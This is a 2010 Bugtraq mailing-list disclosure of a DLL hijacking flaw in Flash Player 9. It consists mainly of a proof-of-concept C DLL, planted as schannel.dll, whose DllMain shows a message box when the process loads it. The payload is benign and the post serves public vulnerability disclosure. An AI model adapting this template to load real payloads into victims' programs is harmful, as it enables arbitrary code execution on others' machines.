[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20100827095419.28701.qmail@securityfocus.com>
Date: 27 Aug 2010 09:54:19 -0000
From: info@...uritylab.ir
To: bugtraq@...urityfocus.com
Subject: Flash Player 9 DLL Hijacking Exploit (schannel.dll)
=======================================================
Flash player 9.exe DLL Hijacking Exploit (schannel.dll)
=======================================================
Founded By: Securitylab.ir (Kamran Safaei Tabrizi)
=======================================================
include "stdafx.h"
void init() {
MessageBox(NULL,"Ops", "OpS!",0x00000003);
}
BOOL APIENTRY DllMain( HANDLE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
init();break;
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
=============================================
Powered by blists - more mailing lists